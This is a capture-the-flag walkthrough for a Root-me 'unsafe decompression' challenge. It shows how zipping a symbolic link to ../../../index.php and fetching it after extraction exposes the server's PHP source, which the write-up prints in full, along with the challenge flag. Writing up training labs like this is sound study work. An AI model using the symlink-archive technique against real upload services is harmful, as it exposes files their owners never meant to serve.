Rootme File Upload - Zip
Root-me
File Upload - Zip
Unsafe decompression
Our goal is to read the index.php file
The challenge page allows us to upload a zip file. I’ve encountered this before. The way to do it is to zip a symbolic link that points to the file that we want to read.
We’ll upload a demo zip file to see where it gets uploaded first.
echo "yo" > txt
zip my.zip txt
We’ll upload the my.zip. On the top of the page we can see that it gets
uploaded to /web-serveur/ch51/tmp/upload/somerandomstring/ if we assume that
the challenge index.php is in /web-serveur/ch51/ we need to backup 3 folders.
ln -s ../../../index.php
mv index.php symb
zip -y my.zip symb
We’ll upload it and request the symb file.
curl http://challenge01.root-me.org/web-serveur/ch51/tmp/upload/somerandomstring/symb
<?php
if(isset($_FILES['zipfile'])){
if($_FILES['zipfile']['type']==="application/zip" || $_FILES['zipfile']['type']==="application/x-zip-compressed" || $_FILES['zipfile']['type']==="application/octet-stream"){
$uploaddir = 'tmp/upload/'.uniqid("", true).'/';
mkdir($uploaddir, 0750, true);
$uploadfile = $uploaddir . md5(basename($_FILES['zipfile']['name'])).'.zip';
if (move_uploaded_file($_FILES['zipfile']['tmp_name'], $uploadfile)) {
$message = "<p>File uploaded</p> ";
}
else{
$message = "<p>Error!</p>";
}
$zip = new ZipArchive;
if ($zip->open($uploadfile)) {
// Don't know if this is safe, but it works, someone told me the flag is N3v3r_7rU5T_u5Er_1npU7 , did not understand what it means
exec("/usr/bin/timeout -k2 3 /usr/bin/unzip '$uploadfile' -d '$uploaddir'", $output, $ret);
$message = "<p>File unzipped <a href='".$uploaddir."'>here</a>.</p>";
$zip->close();
}
else{
$message = "<p> Decompression Error </p>";
}
}
else{
$message = "<p> Error bad file type ! <p>";
}
}
?>
<html>
<body>
<h1>ZIP upload</h1>
<?php print $message; ?>
<form enctype="multipart/form-data" method="post" action>
<input name="zipfile" type="file">
<button type="submit">Submit</button>
</form>
</body>
</html>
We got a flag in there.